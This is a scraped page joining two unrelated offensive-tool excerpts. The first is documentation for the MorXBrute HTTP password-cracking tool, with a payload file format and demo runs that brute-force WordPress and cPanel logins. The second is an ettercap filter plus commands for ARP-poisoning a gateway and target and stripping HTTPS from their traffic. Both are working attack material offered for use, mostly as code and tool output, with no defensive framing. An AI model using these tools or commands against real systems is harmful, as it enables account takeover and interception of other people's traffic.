Location: http://testserver/wp-admin/ <——– HERE Content-Length: 0 Connection: close On the failed login attempt log check also for the location response. If you can’t find the location response in the failed login log then bingo that’s the server telling you that your password works, and that’s our key! Otherwise and if the server responds with the same location either way then it’s probably trying to validate the newly assigned cookie on the next step. In some rare cases, some scripts use the main restricted area (admin panel/mailbox etc) script to process login requests in this case you can easily find the regex key by looking either at the cookie value (BITRIX_SM_LOGIN=admin in Bitrix case) or anything different in the HTML code, a welcome message (Welcome user to inbox as an example) and add it in the payload as Welcome(.*?)to Payload file structure: The structure is very simple, there are 4 values seperated by comma “,” 1- POST: HTTP method (could be either POST or GET) 2- login.php: the login script path Note: this is the full path, if your script is installed in a subdirectory then you should include that too for example if your wordpress is installed in http://localhost/wordpress then you should include it in the payload (POST:wordpress/wp-login.php) 3- login parameters (login and password) Note: $user and $pwd are used by MorXBrute and should not be changed 4- MorXploit: Cookie value, change if required by the remote login 5- Regex key POST,login.php,login=$user&password=$pwd,MorXploit,Location:(.*) Note: Although wordpress takes other data paremeters besides log and pwd such as redirect_to and testcookie, it only requires those first two. Demo: POST Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl demo.opensourcecms.com:80 admin word.lst payloads/wordpressv3.7.1 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to demo.opensourcecms.com:80 [*] user set to admin [*] Wordlist set to word.lst [*] payload set to payloads/wordpressv3.7.1 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed [-] x3demob -> Failed ============================================================ [+] CRACKED! Your password is demo123 [+] Found at line 10 of word.lst [+] Cracked in 6 seconds ============================================================ GET Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl x3demob.cpx3demo.com:2082 x3demob word.lst payloads/cpanelgetprov1.0 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to x3demob.cpx3demo.com:2082 [*] user set to x3demob [*] Wordlist set to word.lst [*] payload set to payloads/cpanelgetprov1.0 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed ============================================================ [+] CRACKED! Your password is x3demob [+] Found at line 9 of word.lst [+] Cracked in 4 seconds ============================================================ TODO: Add SSL suport Add a payload generator And maybe more? Submit your payloads: Your contribution is needed! Please submit your payloads to simo_at_morxploit_com Make sure to include software/service details such as name, URL and version number Also please feel free to submit all your suggestions and bugs. Thanks and happy MorXBruteForcing! Source: MorXBrute HTTP Password cracking tool

Just place it in HTTPS.FILTER, then compile it using "etterfilter" with the command : etterfilter https.filter -o https.ef Then You good to go with : ettercap -T -q -F https.ef -M ARP:remote /GATEWAY/ /TARGET_IP/ . ## # # This filter will substitute the word 'https' with 'http' on # both HTTP requests and responses. # # based on the discussion (and contained code) on forum thread # http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html # ## ########################## ## Zap Content Encoding ## ########################## if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("[HTTP Response Filter] Encoding zapped.\n"); } } ##################### ## Replace Content ## ##################### ## # Requests if (ip.proto == TCP && tcp.dst == 80) { # msg("[HTTP Response Filter] HTTP request seen.\n"); if (search(DECODED.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } if (search(DATA.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } } ## # Response if (ip.proto == TCP && tcp.src == 80) { # msg("[HTTP Response Filter] HTTP response seen.\n"); if (search(DECODED.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); } if (search(DATA.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); } } Source: I'M NASRO, I PENTEST ^^